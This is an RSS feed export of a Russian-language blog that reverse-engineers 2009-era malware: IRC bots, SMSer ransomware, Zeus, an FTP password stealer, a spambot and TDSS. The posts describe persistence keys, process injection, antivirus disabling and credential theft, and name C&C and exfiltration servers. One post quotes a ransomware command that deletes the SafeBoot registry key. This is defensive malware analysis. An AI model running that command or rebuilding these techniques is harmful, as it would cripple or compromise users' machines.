<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-7303348839427374548</atom:id><lastBuildDate>Fri, 01 Nov 2024 10:34:43 +0000</lastBuildDate><category>malware</category><category>IRC</category><category>SMSer</category><category>spambot</category><category>usb infect</category><category>Delphi</category><category>Virut</category><category>Zeus</category><category>bot</category><category>&quot;the AV End&quot;</category><category>ANTIVM.dll</category><category>AVPKill</category><category>Cutwail</category><category>DDoS bot</category><category>FTP Infect</category><category>FTP Pass</category><category>Frame inject</category><category>HTTP/SOCKS Bot</category><category>Infect</category><category>Kobcka</category><category>LineageII</category><category>Macrovisions</category><category>Ping Pong</category><category>Px.ax</category><category>Ransom</category><category>Siberia2</category><category>TDSS</category><category>UnHook</category><category>UrlDownloadToFile</category><category>Virus</category><category>WebMoney</category><category>Winlock</category><category>begun.ru</category><category>china worm</category><category>kernel32.dll</category><category>smallbot</category><category>userinit.exe</category><category>ws2_32.dll</category><title>Research and reversing malware</title><description>Author: GMax&#xa;(e_gmax@mail.ru)</description><link>http://gmax-blog.blogspot.com/</link><managingEditor>noreply@blogger.com (GMax)</managingEditor><generator>Blogger</generator><openSearch:totalResults>38</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-1072223593088203682</guid><pubDate>Fri, 24 Jul 2009 16:03:00 +0000</pubDate><atom:updated>2009-07-24T09:10:30.445-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">bot</category><category domain="http://www.blogger.com/atom/ns#">IRC</category><title>Backdoor.Win32.IRCBot.gen</title><description>Имя файла: msdrv32.exe&lt;br /&gt;Размер: 56.00 Kb&lt;br /&gt;Date/Time Stamp(GMT): 18.07.2009 8:06&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/66391643f7a979d6752082dd0e3bfe62a47ef8a9f45533766e5636f1b8aed43a-1248163389&quot;&gt;www.virustotal.com&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.threatexpert.com/report.aspx?md5=c0c655422e3d0711b1c3f3f843245b49&quot;&gt;www.threatexpert.com&lt;/a&gt;&lt;br /&gt;Файл ни чем не обработан. Вначале идет код для определения отладки и запуска под VMware. Затем по несложному алгоритму расшифровываются строки (имена функций). Затем расшифровывается из ресурсов основная программа. Далее запускается процесс explorer.exe  производится инжект и запуск.&lt;br /&gt;Размер: 46.50 Kb&lt;br /&gt;Date/Time Stamp(GMT): 18.07.2009 8:06&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/bd8ad7bf5bf8b4d9b09bac8389329ff4565cb7e198d62d558c18b5f03a0ad7ef-1248180839&quot;&gt;www.virustotal.com&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.threatexpert.com/report.aspx?md5=c4bc81649f5cbf56bfce64c457ebcdda&quot;&gt;www.threatexpert.com&lt;/a&gt; &lt;br /&gt;Вначале инициализируется импорт. Затем исполняемый файл копируется в “WINDOWS\msdrv32.exe”, устанавливается в автозагрузку через “ SOFTWARE\Microsoft\Windows\CurrentVersion\Run\” и “ SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\” имя ключа “ Microsoft Driver Setup”. Далее в реестр прописывается исключения встроенного фаервола, запускаются два дополнительных потока, просматривающих списки из 258 и 135 соответственно имен файлов, и в случае нахождения процесса завершающие его.  Затем бот соединяет с командным центром  по протоколу IRC и выполняет задания. Бот умеет сканировать порты, скачивать и запускать программы и свои обновления и т.д. Для получения внешнего IP адреса бот опрашивает один из четырех прокси серверов:&lt;br /&gt;http://www.mcreate.net/cgi-bin/envchk/prxjdg.cgi&lt;br /&gt;http://kuwago.hp.infoseek.co.jp/cgi-bin/nph/prxjdg.cgi&lt;br /&gt;http://www.cooleasy.com/cgi-bin/prxjdg.cgi&lt;br /&gt;http://www.cship.info/cgi-bin/prxjdg.cgi&lt;br /&gt;Командный центр по адресу &lt;span style=&quot;font-weight:bold;&quot;&gt;www.messenger.tinypic.name&lt;/span&gt;. &lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu_6wDV-kf-cXNNvyCOb7Jh1zvyukrK9wa3jZMZZW541s-7k9ylIYfCNoloYTXrL9Nv0tO8eAzkZH5K9Td7Qykc0D_wRl8I1XKDFDkNfPdracRZrP0VJnJBO4MKiEMAXaYBJiUReC0mbc/s1600-h/02.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 39px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu_6wDV-kf-cXNNvyCOb7Jh1zvyukrK9wa3jZMZZW541s-7k9ylIYfCNoloYTXrL9Nv0tO8eAzkZH5K9Td7Qykc0D_wRl8I1XKDFDkNfPdracRZrP0VJnJBO4MKiEMAXaYBJiUReC0mbc/s400/02.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5362058538093938162&quot; /&gt;&lt;/a&gt;</description><link>http://gmax-blog.blogspot.com/2009/07/backdoorwin32ircbotgen.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu_6wDV-kf-cXNNvyCOb7Jh1zvyukrK9wa3jZMZZW541s-7k9ylIYfCNoloYTXrL9Nv0tO8eAzkZH5K9Td7Qykc0D_wRl8I1XKDFDkNfPdracRZrP0VJnJBO4MKiEMAXaYBJiUReC0mbc/s72-c/02.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-8415473559599612724</guid><pubDate>Fri, 17 Jul 2009 15:54:00 +0000</pubDate><atom:updated>2009-07-17T10:26:20.257-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">AVPKill</category><category domain="http://www.blogger.com/atom/ns#">SMSer</category><category domain="http://www.blogger.com/atom/ns#">Zeus</category><title>Trojan.Win32.Vaklik.fie</title><description>Имя файла: foto20.scr &lt;br /&gt;Размер: 291.50 Kb&lt;br /&gt;Date/Time Stamp(GMT): 31.03.2008 7:46&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/4b02951f7d7c9448752b61863d3ab548cc42e1b2d1a3cd0f877136140789eaab-1246040729&quot;&gt;www.virustotal.com&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.threatexpert.com/report.aspx?md5=686245a53d8711de0087fdbf8edeb3d5&quot;&gt;www.threatexpert.com&lt;/a&gt;&lt;br /&gt;Файл обернут криптором с множеством анти-отладочных приемов. Расшифровывает из своего тела 3 файла (svvghost.exe, exploree.exe, shl.exe) и записывает их в папку WINDOWS и запускает.&lt;br /&gt;Имя файла: svvghost.exe&lt;br /&gt;Размер: 98.50 Kb&lt;br /&gt;Date/Time Stamp(GMT): 14.12.2007 10:31&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/f9497ce94c6d20ddafaf3dd51da8e8df2d4b7ad56837d422a442f17401361b3c-1246052221&quot;&gt;www.virustotal.com&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.threatexpert.com/report.aspx?md5=6168c87edbcc915cc90bbc75cabd0e2d&quot;&gt;www.threatexpert.com&lt;/a&gt;&lt;br /&gt;Программа обработана тем же криптором, что и дропер. Написана на Delphi. Очередная версия трояна вымогателя SMSer. Блокирует загрузку в безопасном режиме командой REG DELETE HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /f.&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitVezp8tBeRlq9Zg3kR1UA1YDrCrHnQGzQvcKhtRpvBpBttC9VbqO71t3wbBv5JzWGUDu1PSCmCgS6qI0WVwa1SPJVPaIpuYSa711GqjhTGotp7gPPvSEMU-oREkaT6n9rrODEqzohQ-I/s1600-h/01.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 300px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitVezp8tBeRlq9Zg3kR1UA1YDrCrHnQGzQvcKhtRpvBpBttC9VbqO71t3wbBv5JzWGUDu1PSCmCgS6qI0WVwa1SPJVPaIpuYSa711GqjhTGotp7gPPvSEMU-oREkaT6n9rrODEqzohQ-I/s400/01.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5359459135931944946&quot; /&gt;&lt;/a&gt;Слово для разблокировки – &lt;span style=&quot;font-weight:bold;&quot;&gt;пользователя&lt;/span&gt;.&lt;br /&gt;Имя файла: exploree.exe&lt;br /&gt;Размер: 66.50 Kb&lt;br /&gt;Date/Time Stamp(GMT): 15.06.2008 23:07&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/f0cfa05216c8dc18e8ad883ea6d3d2b047a3d76872ff7a6fc409b87fda1a02fd-1246052314&quot;&gt;www.virustotal.com&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.threatexpert.com/report.aspx?md5=20f0e630e81fcd5253098d491cdd1dc5&quot;&gt;www.threatexpert.com&lt;/a&gt;&lt;br /&gt;После слоя криптора идет попытка отключить Kaspersky антивирус, эта часть программы называется &lt;span style=&quot;font-weight:bold;&quot;&gt;AVPKill&lt;/span&gt;. Троян ищет окна относящиеся к антивирусу и с помощью эмуляции нажатия клавиш закрывает окна с предупреждением и вносит в исключения. Программа рассчитана как на русский, так и английский интерфейс антивируса. &lt;br /&gt;Далее троян собирает пароли от следующих программ:&lt;br /&gt;Bat!&lt;br /&gt;ICQ Mirabilis&lt;br /&gt;R&amp;Q&lt;br /&gt;Trillian&lt;br /&gt;RasPhone&lt;br /&gt;Total Commander&lt;br /&gt;Becky!&lt;br /&gt;Internet Account Manager&lt;br /&gt;CuteFTP&lt;br /&gt;Edialer&lt;br /&gt;Far FTP&lt;br /&gt;Ipswitch&lt;br /&gt;Opera&lt;br /&gt;Firefox&lt;br /&gt;QIP&lt;br /&gt;Thunderbird&lt;br /&gt;Mail.Ru Agent&lt;br /&gt;Eudora&lt;br /&gt;Punto Switcher&lt;br /&gt;Outlook&lt;br /&gt;Gaim&lt;br /&gt;FileZilla&lt;br /&gt;Flash FXP&lt;br /&gt;Windows Live&lt;br /&gt;SmartFTP&lt;br /&gt;CoffeeCup&lt;br /&gt;USDownloader&lt;br /&gt;FTP Commander&lt;br /&gt;Затем собранную информацию отсылает по адресу: &lt;span style=&quot;font-weight:bold;&quot;&gt;www.mriya.net/img/icon/dfFgj5.php&lt;/span&gt; &lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4UXsB4Ye_sq8dbwyQ1GqW9sDoGyhJ9-wuRc8wcWm05KupX3iA6W8ReSZytjJNVrNpJFGM1r2RFwRHM1YnKJ_6V99kNT9LRCnEDk-JXYoHxu6DZkVwpH9eGjxfSt-waUQSNJE3Q9XCwfA/s1600-h/02.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 24px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4UXsB4Ye_sq8dbwyQ1GqW9sDoGyhJ9-wuRc8wcWm05KupX3iA6W8ReSZytjJNVrNpJFGM1r2RFwRHM1YnKJ_6V99kNT9LRCnEDk-JXYoHxu6DZkVwpH9eGjxfSt-waUQSNJE3Q9XCwfA/s400/02.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5359459139726823458&quot; /&gt;&lt;/a&gt;Имя файла: shl.exe&lt;br /&gt;Размер: 94.00 Kb&lt;br /&gt;Date/Time Stamp(GMT): 07.06.2009 20:10&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/829b4c10ed77e265c100c6742d45e7091f8905a74305a188a91db6c7bc55dade-1246052539&quot;&gt;www.virustotal.com&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.threatexpert.com/report.aspx?md5=9c81e529e792effc3d57f9cc1a998e4e&quot;&gt;www.threatexpert.com&lt;/a&gt;&lt;br /&gt;Уже описываемый троян Zevs/Zbot с небольшими изменениями, &lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsuIiZ6ylIbU6lL-YO8UagIVt9xnDuNkHWJok4tYIHU5UFx47ar6DZaqpIlVKB2XeSyeHKDD9aWioZabKfpQsyURBjHEWf_npPEJ8F0ZjmSE-lY-X_8wLKO_lEjn0ZP-Fer0SGSdp2zVg/s1600-h/04.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 257px; height: 84px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsuIiZ6ylIbU6lL-YO8UagIVt9xnDuNkHWJok4tYIHU5UFx47ar6DZaqpIlVKB2XeSyeHKDD9aWioZabKfpQsyURBjHEWf_npPEJ8F0ZjmSE-lY-X_8wLKO_lEjn0ZP-Fer0SGSdp2zVg/s400/04.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5359459148878717426&quot; /&gt;&lt;/a&gt;C&amp;C находится по адресу:&lt;br /&gt;&lt;span style=&quot;font-weight:bold;&quot;&gt;http://b18c.cn/pn/config.bin&lt;/span&gt;. &lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTfeOXJlYJbvdJXndoM_a1fhNRTKrf-e6uK45qMaHlNv8a6RrU0sC-3DlwoYaKRGOQ1evj1Y-p5h6aE5P39CBZsByngswxex4DUwvAsA7tJGTj9T1Zx6xsd7zkYX5iE3EfKu3mjNnLCSQ/s1600-h/03.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 48px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTfeOXJlYJbvdJXndoM_a1fhNRTKrf-e6uK45qMaHlNv8a6RrU0sC-3DlwoYaKRGOQ1evj1Y-p5h6aE5P39CBZsByngswxex4DUwvAsA7tJGTj9T1Zx6xsd7zkYX5iE3EfKu3mjNnLCSQ/s400/03.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5359459145977833250&quot; /&gt;&lt;/a&gt;</description><link>http://gmax-blog.blogspot.com/2009/07/trojanwin32vaklikfie.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitVezp8tBeRlq9Zg3kR1UA1YDrCrHnQGzQvcKhtRpvBpBttC9VbqO71t3wbBv5JzWGUDu1PSCmCgS6qI0WVwa1SPJVPaIpuYSa711GqjhTGotp7gPPvSEMU-oREkaT6n9rrODEqzohQ-I/s72-c/01.JPG" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-5180957875842441630</guid><pubDate>Sat, 11 Jul 2009 08:33:00 +0000</pubDate><atom:updated>2009-07-11T01:37:25.056-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Frame inject</category><category domain="http://www.blogger.com/atom/ns#">SMSer</category><title>Trojan-Ransom.Win32.SMSer.ee</title><description>Имя файла: SiteAccess.dll&lt;br /&gt;Размер: 37.50 Kb&lt;br /&gt;Date/Time Stamp(GMT): 22.06.2009 14:04&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/ac8da0e6a0ed138d763fdad645b3afd548bff7e731b9b7e493ef0244166b0ef3-1246646931&quot;&gt;www.virustotal.com&lt;/a&gt; &lt;br /&gt;Файл обернут слоем краптора. Сначала троян проверяет в адресном пространстве какого процесса он находится, если это не iexplore.exe, opera.exe, firefox.exe, chrome.exe, то троян просто завершает свою работу. Если библиотека загружена в один из перечисленных браузеров, то производится перехват функций для работы по сети: send, recv, WSASend, WSARecv, socket, closesocket, connect, WSAConnect, select. Троян осуществляет подмену выдачи Интернет запросов браузера. Технически это достигается добавлением в код страницы следующего фрейма:&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTbjviv5sh4zMqbmHUzrSIi3Bv7n3AUkId5eprEnhiShHIydxZgrwgJC4mYLEGgGbFmACMrZErmi1WKxsXDm_PMWSBv2sFwkMvClqVn1GmKTT13GCaC7Tu3Hdytq4wv5xd3QsyA2-Dh8k/s1600-h/01.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 136px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTbjviv5sh4zMqbmHUzrSIi3Bv7n3AUkId5eprEnhiShHIydxZgrwgJC4mYLEGgGbFmACMrZErmi1WKxsXDm_PMWSBv2sFwkMvClqVn1GmKTT13GCaC7Tu3Hdytq4wv5xd3QsyA2-Dh8k/s400/01.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5357118349412024818&quot; /&gt;&lt;/a&gt;Рекламный банер для показа берется с адреса: &lt;span style=&quot;font-weight:bold;&quot;&gt;http://sex-bot.biz/plugin/showbanners.php&lt;/span&gt;.</description><link>http://gmax-blog.blogspot.com/2009/07/trojan-ransomwin32smseree.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTbjviv5sh4zMqbmHUzrSIi3Bv7n3AUkId5eprEnhiShHIydxZgrwgJC4mYLEGgGbFmACMrZErmi1WKxsXDm_PMWSBv2sFwkMvClqVn1GmKTT13GCaC7Tu3Hdytq4wv5xd3QsyA2-Dh8k/s72-c/01.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-5939732482338479691</guid><pubDate>Fri, 03 Jul 2009 17:44:00 +0000</pubDate><atom:updated>2009-07-03T10:49:11.667-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">FTP Pass</category><category domain="http://www.blogger.com/atom/ns#">UnHook</category><title>Trojan.Win32.Agent.cmkg</title><description>Имя файла: proquota.exe&lt;br /&gt;Размер: 45.00 Kb&lt;br /&gt;Date/Time Stamp(GMT): 21.01.2006 17:24&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/60aa0272a008d28d73fdc0ee63d302654a76d50b52a3f50c42cc539eae7757d0-1246613824&quot;&gt;http://www.virustotal.com&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.threatexpert.com/report.aspx?md5=bdbe38bd04df23d81153e08092f8aa53&quot;&gt;http://www.threatexpert.com&lt;/a&gt; &lt;br /&gt;Файл обработан криптором. Исполнение кода начинается с инициализации импорта, по хешу от имени. Затем идет инициализация констант в зависимости от версии Windows. Строки зашифрованы алгоритмом основанном на xor, каждая строка расшифровывается непосредственно перед использованием, а после вновь зашифровывается. Далее идет процедура поиска сплайсинга некоторых системных функций из kernal32.dll и ntdll.dll и снятия путем сопоставления первых 7 байтов функции в памяти и в файле. Если файл еще не установлен в систему, то производится его установка. Файл копируется в “System32\Wbem\proquota.exe” и ему выставляется время создания идентичное файлу “smss.exe”. Заменяет файл “System32\dllcache\proquota.exe”. Автозагрузка производится через ветку “Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableProfileQuota”.&lt;br /&gt;Затем из тела файла расшифровывается файл (18.55 Кб) и создается дополнительный поток созданного “зомби” процесса “svchost.exe”.&lt;br /&gt;Имя файла: file.exe&lt;br /&gt;Размер: 18.55 Kb&lt;br /&gt;Date/Time Stamp(GMT): 10.06.2009 14:01&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/f619e810e1470bb3d2c16fad4697a10866ff920537c907936adf230a1d9cadfb-1246614230&quot;&gt;http://www.virustotal.com&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.threatexpert.com/report.aspx?md5=c84c0953429894cc1c2b130a75786ce5&quot;&gt;http://www.threatexpert.com&lt;/a&gt; &lt;br /&gt;Файл обработан криптором. В первую очередь расшифровываются строки, затем инициализируется импорт. &lt;br /&gt;Программа занимается тем, что ищет на диске и в реестре логины и пароли в местах, где их обычно хранят программы для работы с FTP. Найденные данные троян отправляет по адресу &lt;span style=&quot;font-weight:bold;&quot;&gt;jarus1.ru&lt;/span&gt;.&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSO9PRlsK3Fikw8zDnAzSJg3yW8NNUxr-2sL_U1AsdD5IVnH_Y1_CV-Xs5SFAJt7gbzv-2_92atc2JLXM66OZf0lGwwRAWr7eBYXAGorvHc3BslrFLat1xdQ7B8rQrvnsYnlo4MbdxDns/s1600-h/01.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 69px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSO9PRlsK3Fikw8zDnAzSJg3yW8NNUxr-2sL_U1AsdD5IVnH_Y1_CV-Xs5SFAJt7gbzv-2_92atc2JLXM66OZf0lGwwRAWr7eBYXAGorvHc3BslrFLat1xdQ7B8rQrvnsYnlo4MbdxDns/s400/01.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5354291873877237842&quot; /&gt;&lt;/a&gt;</description><link>http://gmax-blog.blogspot.com/2009/07/trojanwin32agentcmkg.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSO9PRlsK3Fikw8zDnAzSJg3yW8NNUxr-2sL_U1AsdD5IVnH_Y1_CV-Xs5SFAJt7gbzv-2_92atc2JLXM66OZf0lGwwRAWr7eBYXAGorvHc3BslrFLat1xdQ7B8rQrvnsYnlo4MbdxDns/s72-c/01.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-894612558127650934</guid><pubDate>Fri, 19 Jun 2009 18:34:00 +0000</pubDate><atom:updated>2009-06-19T11:37:57.332-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">spambot</category><title>Email-Worm.Win32.Joleee.asq</title><description>Имя файла: load.exe&lt;br /&gt;Размер: 26.00 Kb&lt;br /&gt;Date/Time Stamp(GMT): 26.08.2006 7:01&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/655e64c9c824c309efeb7a3380967423&quot;&gt;http://www.virustotal.com/ru/analisis/655e64c9c824c309efeb7a3380967423&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.threatexpert.com/report.aspx?md5=ee3e3d66e4c3c7f0b56fe9fac060642f&quot;&gt;http://www.threatexpert.com/report.aspx?md5=ee3e3d66e4c3c7f0b56fe9fac060642f&lt;/a&gt;&lt;br /&gt;Одна из первых версий популярного спам бота. Файл обернут слоем криптора/протектора. После расшифровки инициализируются необходимые для работы функции. Далее запускается поток, который устанавливает файл в автозагрузку каждые 5 секунд. Далее запускается еще один поток, который и выполняет основную работу по рассылки писем. Вначале бот соединяется с C&amp;C по адресу: &lt;span style=&quot;font-weight:bold;&quot;&gt;66.232.126.138/spm/get_id.php&lt;/span&gt; скачивает файл и сохраняет его под именем _id.dat. Затем по полученным данным производится рассылка писем.&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVEWt8H3LJx3ivCui9g121rS7u3XBtMn-8NYZtgG9etKCRSmntS68c3xQlDXn5u2C1vObEu6vDC9entvp3_29iExYIWfnWQxknGV-tYfYXi0587lj2GjibF5uDZ1VAzNfqAN7hwIO-wwY/s1600-h/01.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 63px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVEWt8H3LJx3ivCui9g121rS7u3XBtMn-8NYZtgG9etKCRSmntS68c3xQlDXn5u2C1vObEu6vDC9entvp3_29iExYIWfnWQxknGV-tYfYXi0587lj2GjibF5uDZ1VAzNfqAN7hwIO-wwY/s400/01.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5349109611430571970&quot; /&gt;&lt;/a&gt;</description><link>http://gmax-blog.blogspot.com/2009/06/email-wormwin32joleeeasq.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVEWt8H3LJx3ivCui9g121rS7u3XBtMn-8NYZtgG9etKCRSmntS68c3xQlDXn5u2C1vObEu6vDC9entvp3_29iExYIWfnWQxknGV-tYfYXi0587lj2GjibF5uDZ1VAzNfqAN7hwIO-wwY/s72-c/01.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-4424826686025098888</guid><pubDate>Sat, 30 May 2009 16:07:00 +0000</pubDate><atom:updated>2009-05-30T09:14:11.406-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">TDSS</category><title>Trojan.Win32.TDSS.rtf</title><description>Имя файла: ddf5d2d88a541c6f532f4eedf5f399ea.exe&lt;br /&gt;Размер: 124.00 Kb&lt;br /&gt;Date/Time Stamp(GMT): 26.02.2009 9:18&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/d946e3b4b97996a576a24e7fad2700c3925da98cf9da22bb92bb51a9ff859f62-1243355864&quot;&gt;http://www.virustotal.com/ru/analisis/d946e3b4b97996a576a24e7fad2700c3925da98cf9da22bb92bb51a9ff859f62-1243355864&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.threatexpert.com/report.aspx?md5=100b5b3f6cfef4c9290a3a7cbd5a58a4&quot;&gt;http://www.threatexpert.com/report.aspx?md5=100b5b3f6cfef4c9290a3a7cbd5a58a4&lt;/a&gt; &lt;br /&gt;Файл обработан криптором с длинной “лапшой” из прыжков разбавленных мусорными инструкциями. Активно используется выделяемая память для размещения расшифровываемых участков криптора, присутствует антиотладка. Сразу после расшифровки основного тела программы в региональных настройках Windows проверяется страна. Если страна входит в список: Azerbaijan, Belarus, Kazakhstan, Kyrgyzstan, Russia, Uzbekistan, Ukraine то процесс завершается.&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-4buNm2S0pNoeG39F4DfOr3nOkDno2s0mcGzHasEgOgJEQMALAD_hTuL-TxWBIZxtgDowTruF62vqqaGruPNdu3TxXv5uytuwBWwFQaRh91sqPhfJEPbgeE8uF7LqNo3B_-1sl3NUx7E/s1600-h/01.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 227px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-4buNm2S0pNoeG39F4DfOr3nOkDno2s0mcGzHasEgOgJEQMALAD_hTuL-TxWBIZxtgDowTruF62vqqaGruPNdu3TxXv5uytuwBWwFQaRh91sqPhfJEPbgeE8uF7LqNo3B_-1sl3NUx7E/s400/01.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5341649815008532130&quot; /&gt;&lt;/a&gt;&lt;br /&gt;Затем из тела программы расшифровывается новый файл размером 96 Кб, и записывается в папку TEMP. Далее программа копирует библиотеку msvcrt.dll в папку TEMP с рандомным именем (с префиксом UAC), и в точку входа библиотеки записывает 23 байта кода, производящего загрузку вызов функции LoadLibrary, производятся манипуляции с объектом “секция”.&lt;br /&gt;Затем запускается сервис &quot;msiserver&quot; (Windows Installer), в адресном пространстве которого, есть библиотека “dll.dll”, которую программа извлекла в папку TEMP.&lt;br /&gt;Имя файла: UAC4864.tmp&lt;br /&gt;Размер: 96.00 Kb&lt;br 